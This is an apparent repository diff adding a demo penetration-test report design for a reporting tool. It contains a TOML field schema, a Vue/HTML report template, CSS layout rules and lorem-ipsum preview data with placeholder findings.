At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
customer = "Example Customer"
duration = "TODO person days"
end_date = "2022-07-08"
is_retest = true
start_date = "2022-07-08"
report_date = "2022-07-08"
executive_summary = """
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
[report_preview_data.report.lead_pentester]
name = "Maxima Mustermensch"
email = "maxima@securitymaximale.com"
phone = "+43 660 123 456 78 "
[[report_preview_data.report.document_history]]
description = "Draft"
date = "2022-07-08"
authors = [
"TODO Author1",
]
version = "0.1"
[[report_preview_data.report.document_history]]
description = "Final Report"
date = "2022-07-08"
authors = [
"TODO Author1",
"TODO Author2",
]
version = "1.0"
[[report_preview_data.findings]]
title = "Demo Finding Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c5012235-9cd4-475f-86de-0236de1b4b88"
references = [
"https://example.com/reference1",
"https://example.com/reference2",
]
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Also Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c6a6d51c-999c-4e8c-a506-596689e73f0b"
references = [
"https://example.com/reference3",
]
retest_notes = ""
retest_status = "open"
affected_components = []
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Low"
cvss = "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "cd3c3719-8536-43d4-878a-cdb9dc842b70"
references = []
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Info"
cvss = "n/a"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "e899b5cf-83d2-48bf-8838-9899246b67fc"
references = []
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[assets]]
id = "9c692534-b436-43a8-aeb3-73e6c7f338a5"
name = "LICENSE"
[[assets]]
id = "7454d0de-ec3b-43f3-9d28-24a045ce199b"
name = "header-logo.png"
[[assets]]
id = "6f56f563-1ad5-4552-a188-ff34c97a7e83"
name = "background-26185.jpg"
[[assets]]
id = "4b253945-b794-4942-b01f-c28ef83b503c"
name = "logo-transparent.png"

21
demo_data/demo-designs/matrix-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

9137
demo_data/demo-designs/matrix-assets/background.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 5.6 MiB

BIN
demo_data/demo-designs/matrix-assets/header-logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 10 KiB

BIN
demo_data/demo-designs/matrix-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 10 KiB

965
demo_data/demo-designs/matrix.toml Normal file
View File

@ -0,0 +1,965 @@
format = "projecttypes/v1"
id = "70ff91a6-567e-45c9-87d9-0587551bc8ff"
name = "Demo Matrix v1.1"
language = "en-US"
finding_field_order = [
"title",
"cvss",
"summary",
"short_recommendation",
"affected_components",
"description",
"recommendation",
"references",
"retest_status",
"retest_notes",
]
report_template = """
<div id="header" data-sysreptor-generated="page-header">
<div id="header-left">
<img src="/assets/name/header-logo.png" alt="logo" />
</div>
<div id="header-right">
<span class="highlight">Security Maximale GmbH</span><br>
Example Street 47 | 4771 Example<br>
FN 12345 v | District Court Example<br>
</div>
</div>
<section id="page-cover">
<div id="page-cover-background">
<img id="page-cover-background-img" src="/assets/name/background.svg" alt="">
</div>
<img id="page-cover-logo" src="/assets/name/logo-transparent.png" alt="">
<div id="page-cover-infobox">
<h1 id="page-cover-title">{{ report.title }}</h1>
</div>
<div id="page-cover-customer">
<p>
<strong>Customer:</strong><br>
<strong><span class="highlight">{{ report.customer }}</span></strong><br>
{{ report.report_date }}<br>
v<template v-if="report.document_history.length > 0">
{{ report.document_history[report.document_history.length - 1].version }}
</template>
<template v-else>0.0</template>
</p>
</div>
<div id="page-cover-contact">
<strong>Contact:</strong><br>
{{ report.lead_pentester.name }}<br>
{{ report.lead_pentester.phone }}<br>
<strong><a :href="'mailto:' + report.lead_pentester.email" class="highlight">{{ report.lead_pentester.email }}</a></strong>
</div>
</section>
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<section>
<h1 id="management-summary" class="in-toc">Executive Summary</h1>
<markdown :text="report.executive_summary" />
</section>
<pagebreak />
<section>
<h1 id="scope" class="in-toc">Methodology and Scope</h1>
<markdown :text="report.scope" />
</section>
<pagebreak />
<section>
<h1 id="findings-summary" class="in-toc">Vulnerability Overview</h1>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<figure>
<chart :width="15" :height="10" :config="{
type: 'bar',
data: {
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{
data: [
finding_stats.count_critical,
finding_stats.count_high,
finding_stats.count_medium,
finding_stats.count_low,
finding_stats.count_info
],
backgroundColor: [
cssvar('--color-risk-critical'),
cssvar('--color-risk-high'),
cssvar('--color-risk-medium'),
cssvar('--color-risk-low'),
cssvar('--color-risk-info')
],
}]
},
options: {
scales: {y: {beginAtZero: true, ticks: {precision: 0}}},
plugins: {legend: {display: false}},
}
}" />
<figcaption id="distribution-of-identified-vulnerabilities">Distribution of identified vulnerabilities</figcaption>
</figure>
<div>
<p>A tabular overview of all vulnerabilities identified:</p>
<table class="finding-summary-table">
<thead>
<tr>
<th>Vulnerability</th>
<th align="center">Criticality</th>
<th v-if="report.is_retest" align="center">Remediation Status</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings">
<td>
<ref :to="finding.id">{{ finding.title }}</ref>
</td>
<td align="center">
<ref :to="finding.id" :class="'risk-' + finding.cvss.level">{{ lodash.capitalize(finding.cvss.level) }}</ref>
</td>
<td v-if="report.is_retest" align="center">
<ref :to="finding.id" :class="'status-' + finding.retest_status.value">{{ finding.retest_status.label }}</ref>
</td>
</tr>
</tbody>
</table>
</div>
<div class="findings-list">
<p>A list of all vulnerabilities including a brief description:</p>
<div v-for="(finding, findingIndex) in findings">
<h6 :id="finding.id + 'overview'">
<ref :to="finding.id" class="finding-title">{{ finding.title }}</ref>
(<span :class="'risk-' + finding.cvss.level"><a v-if="finding.cvss.vector.startsWith('CVSS:3.1')" :href="'https://www.first.org/cvss/calculator/3.1#' + finding.cvss.vector" class="link-none">{{ capitalize(finding.cvss.level) }}: {{ finding.cvss.score}}</a><a v-else-if="finding.cvss.vector.startsWith('CVSS:3.0')" :href="'https://www.first.org/cvss/calculator/3.0#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score }}</a><template v-else>{{ capitalize(finding.cvss.level) }}: {{ finding.cvss.score }}</template></span><template v-if="report.is_retest || (finding.retest_status.value && finding.retest_status.value !== 'open')"> | <span :class="'status-' + (finding.retest_status.value || 'open')">{{ finding.retest_status.label || 'Offen' }}</span></template>)
</h6>
<div v-if="finding.affected_components && finding.affected_components.length > 0">
Affects:
<markdown v-if="finding.affected_components.length == 1" :text="finding.affected_components[0]" class="markdown-inline" />
<ul v-else class="location-ul">
<li v-for="component in finding.affected_components">
<markdown :text="component" class="markdown-inline" />
</li>
</ul>
</div>
<markdown :text="finding.summary" />
</div>
</div>
</section>
<pagebreak />
<section id="findings-list" class="findings-list">
<h1 id="findings-details" class="in-toc">Vulnerability Details</h1>
<div v-for="(finding, findingIndex) in findings">
<h2 :id="finding.id" class="in-toc" :data-toc-title="finding.title + ' (' + capitalize(finding.cvss.level) + ')'">
<ref :to="finding.id + 'overview'" class="finding-title">{{ finding.title }}</ref>
</h2>
<div>
<template v-if="report.is_retest || finding.retest_status.value !== 'open'">
<strong>Remediation Status: </strong><span :class="'finding-status-' + finding.retest_status.value">{{ finding.retest_status.label }}</span><br>
</template>
<strong>Criticality: </strong><span :class="'risk-' + finding.cvss.level">{{ capitalize(finding.cvss.level) }}</span><br>
<strong>CVSS-Score: </strong>
<span :class="'risk-' + finding.cvss.level">
<a v-if="finding.cvss.vector.startsWith('CVSS:3.1')" :href="'https://www.first.org/cvss/calculator/3.1#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score}}</a>
<a v-else-if="finding.cvss.vector.startsWith('CVSS:3.0')" :href="'https://www.first.org/cvss/calculator/3.0#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score }}</a>
<span v-else>{{ finding.cvss.score }}</span>
</span><br>
<template v-if="finding.affected_components && finding.affected_components.length > 0">
<strong>Affects: </strong>
<markdown v-if="finding.affected_components.length == 1" :text="finding.affected_components[0]" class="markdown-inline" />
<ul v-else class="location-ul">
<li v-for="component in finding.affected_components">
<markdown :text="component" class="markdown-inline" />
</li>
</ul>
</template>
<template v-if="finding.short_recommendation">
<strong>Recommendation: </strong>
<markdown :text="finding.short_recommendation" class="markdown-inline" /><br>
</template>
</div>
<div>
<h3>Overview</h3>
<markdown :text="finding.summary" />
</div>
<div v-if="finding.retest_notes">
<h3>Remarks on Remediation Status</h3>
<markdown :text="finding.retest_notes" />
</div>
<div>
<h3 :id="finding.id + '-description'">Description</h3>
<markdown :text="finding.description" />
</div>
<div>
<h3 :id="finding.id + '-recommendation'">Recommendation</h3>
<markdown :text="finding.recommendation" />
</div>
<div v-if="finding.references && finding.references.length > 0">
<h3>Additional Information</h3>
<ul>
<li v-for="reference in finding.references">
<a :href="reference">{{ reference }}</a>
</li>
</ul>
</div>
<pagebreak />
</div>
</section>
<section>
<h1 id="document-history" class="in-toc">List of Changes</h1>
<table>
<thead>
<tr>
<th align="center">Version</th>
<th align="center">Date</th>
<th>Description</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr v-for="item in report.document_history">
<td align="center">{{ item.version }}</td>
<td align="center">{{ item.date }}</td>
<td>{{ item.description }}</td>
<td>
<comma-and-join>
<template v-for="author in item.authors" #[author]>{{ author }}</template>
</comma-and-join>
</td>
</tr>
</tbody>
</table>
</section>
<markdown>
# Disclaimer {#disclaimer .in-toc}
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
</markdown>
<markdown>
# Imprint {#imprint .in-toc}
Security Maximale GmbH<br>
Example Street 47 | 4711 Example<br>
FN 12345 v | District Court Example<br>
</markdown>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #8c00fc;
--color-risk-high: #ed0003;
--color-risk-medium: #f0d400;
--color-risk-low: #009dff;
--color-risk-info: #00bc00;
--color-status-open: #ed0003;
--color-status-partial: #f0d400;
--color-status-resolved: #00e200;
--color-status-accepted: #00e200;
--color-status-changed: #009dff;
--color-highlight: #88ee44;
}
/* Font settings */
html {
font-family: "Roboto Flex", sans-serif;
font-size: 11pt;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.status-open { color: var(--color-status-open) !important; font-weight: bold; }
.status-partial { color: var(--color-status-partial) !important; font-weight: bold; }
.status-resolved { color: var(--color-status-resolved) !important; font-weight: bold; }
.status-accepted { color: var(--color-status-accepted) !important; font-weight: bold; }
.status-changed { color: var(--color-status-changed) !important; font-weight: bold; }
.highlight { color: var(--color-highlight); }
/* PDF-specific global styles */
@page {
size: A4 portrait;
margin: 35mm 26mm 26mm 26mm;
}
a {
color: inherit;
text-decoration: none;
}
pre code {
background-color: whitesmoke;
padding: 0.2em !important;
}
.location-ul {
margin: 0;
margin-bottom:0.2em;
}
/* #region header */
@page {
margin-top: 35mm;
--header-background-color: black;
--header-margin-bottom: 5mm;
@top-left-corner {
content: "";
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
}
@top-left {
content: element(header-left);
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right {
content: element(header-right);
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right-corner {
content: "";
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
}
}
#header #header-left { position: running(header-left); }
#header #header-left {
width: 60%;
}
#header #header-left img {
width: auto;
height: auto;
}
#header #header-right {
position: running(header-right);
text-align: right;
color: white;
font-size: 9pt;
}
/* #endregion header */
/* #region footer */
@page {
@bottom-right-corner {
/* Page number */
content: counter(page) " / " counter(pages);
font-size: 9pt;
}
}
/* #endregion footer */
/* #region page-cover */
#page-cover {
margin: -35mm -26mm 10mm -26mm;
}
#page-cover-background {
width: 100%;
height: 120mm;
overflow: hidden;
background-color: black;
}
#page-cover-background-img {
width: 100%;
transform: scale(1.16) translateY(-11%);
opacity: 0.7;
}
#page-cover-logo {
position: absolute;
top: -30mm;
left: -7mm;
width: 50%;
}
#page-cover-logo-text {
position: absolute;
top: -12mm;
left: 4mm;
color: #ffffff;
}
#page-cover-infobox {
position: absolute;
top: 30mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-title {
font-size: 18pt;
font-weight: normal;
margin-top: 0;
margin-bottom: 0.3em;
}
#page-cover-customer {
position: absolute;
top: 43mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-contact {
position: absolute;
top: 46mm;
right: 4mm;
text-align: right;
color: #ffffff;
}
@page :first {
/* Hide header */
@top-left-corner { content: none !important; }
@top-left { content: none !important; }
@top-center { content: none !important; }
@top-right { content: none !important; }
@top-right-corner { content: none !important; }
/* Hide footer */
@bottom-left-corner { content: none !important; }
@bottom-left { content: none !important; }
@bottom-center { content: none !important; }
@bottom-right { content: none !important; }
@bottom-right-corner { content: none !important; }
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(" ") " " target-counter(attr(href), page);
font-weight: normal;
}
#toc .toc-level1 {
padding-left: 0;
margin-top: 0.7rem;
font-weight: bold;
}
#toc .toc-level2 {
padding-left: 1.5rem;
margin-top: 0.35rem;
font-weight: normal;
}
#toc .toc-level3 {
padding-left: 3rem;
margin-top: 0.25rem;
font-weight: normal;
}
#toc .toc-level4 {
padding-left: 4.5rem;
margin-top: 0;
font-weight: normal;
}
/* #endregion toc */
/* #region findings-list */
.findings-list {
counter-reset: finding-counter;
}
.findings-list .finding-title::before {
counter-increment: finding-counter;
content: counter(finding-counter) ". ";
}
/* #endregion findings-list */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO report title"
required = true
spellcheck = true
[report_fields.scope]
type = "markdown"
label = "Scope"
origin = "custom"
default = """
**TODO scope**
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
required = true
[report_fields.customer]
type = "string"
label = "Customer"
origin = "custom"
default = "TODO customer"
required = true
spellcheck = false
[report_fields.duration]
type = "string"
label = "Duration"
origin = "custom"
default = "TODO person days"
required = true
spellcheck = false
[report_fields.end_date]
type = "date"
label = "Pentest End Date"
origin = "custom"
required = true
[report_fields.is_retest]
type = "boolean"
label = "Is Retest"
origin = "predefined"
[report_fields.start_date]
type = "date"
label = "Pentest Start Date"
origin = "custom"
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.lead_pentester]
type = "object"
label = "Lead Pentester"
origin = "custom"
[report_fields.lead_pentester.properties]
[report_fields.lead_pentester.properties.name]
type = "string"
label = "Name"
origin = "custom"
default = "TODO name"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.email]
type = "string"
label = "Email"
origin = "custom"
default = "TODO email"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.phone]
type = "string"
label = "Phone Number"
origin = "custom"
default = "TODO phone"
required = true
spellcheck = false
[report_fields.document_history]
type = "list"
label = "Document History"
origin = "custom"
required = true
[report_fields.document_history.items]
type = "object"
label = ""
origin = "custom"
[report_fields.document_history.items.properties]
[report_fields.document_history.items.properties.description]
type = "string"
label = "Description"
origin = "custom"
default = "TODO description"
required = true
spellcheck = false
[report_fields.document_history.items.properties.date]
type = "date"
label = "Date"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors]
type = "list"
label = "Authors"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors.items]
type = "string"
label = ""
origin = "custom"
default = "TODO author"
required = true
spellcheck = false
[report_fields.document_history.items.properties.version]
type = "string"
label = "Version"
origin = "custom"
default = "TODO version"
required = true
spellcheck = false
[report_fields.executive_summary]
type = "markdown"
label = "Executive Summary"
origin = "custom"
default = """
**TODO summary**
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
required = true
[[report_sections]]
id = "executive_summary"
label = "Executive Summary"
fields = [
"executive_summary",
]
[[report_sections]]
id = "scope"
label = "Scope"
fields = [
"scope",
"duration",
"start_date",
"end_date",
]
[[report_sections]]
id = "customer"
label = "Customer"
fields = [
"customer",
]
[[report_sections]]
id = "other"
label = "Other"
fields = [
"title",
"report_date",
"lead_pentester",
"document_history",
"is_retest",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO: New Finding"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.summary]
type = "markdown"
label = "Summary"
origin = "predefined"
default = "TODO summary"
required = true
[finding_fields.description]
type = "markdown"
label = "Technical Description"
origin = "predefined"
default = "TODO description"
required = true
[finding_fields.recommendation]
type = "markdown"
label = "Recommendation"
origin = "predefined"
default = "TODO recommendation"
required = true
[finding_fields.references]
type = "list"
label = "References"
origin = "predefined"
required = false
[finding_fields.references.items]
type = "string"
label = ""
origin = "predefined"
required = true
spellcheck = false
[finding_fields.retest_notes]
type = "markdown"
label = "Re-test Notes"
origin = "predefined"
required = false
[finding_fields.retest_status]
type = "enum"
label = "Re-test Status"
origin = "predefined"
required = false
[[finding_fields.retest_status.choices]]
label = "Open"
value = "open"
[[finding_fields.retest_status.choices]]
label = "Resolved"
value = "resolved"
[[finding_fields.retest_status.choices]]
label = "Partially Resolved"
value = "partial"
[[finding_fields.retest_status.choices]]
label = "Changed"
value = "changed"
[[finding_fields.retest_status.choices]]
label = "Accepted"
value = "accepted"
[finding_fields.affected_components]
type = "list"
label = "Affected Components"
origin = "predefined"
required = true
[finding_fields.affected_components.items]
type = "string"
label = "Component"
origin = "predefined"
default = "TODO affected component"
required = true
spellcheck = false
[finding_fields.short_recommendation]
type = "string"
label = "Short Recommendation"
origin = "predefined"
required = true
spellcheck = true
[report_preview_data]
[report_preview_data.report]
title = "Example Web-App"
scope = """
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
customer = "Example Customer"
duration = "TODO person days"
end_date = "2022-07-08"
is_retest = true
start_date = "2022-07-08"
report_date = "2022-07-08"
executive_summary = """
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
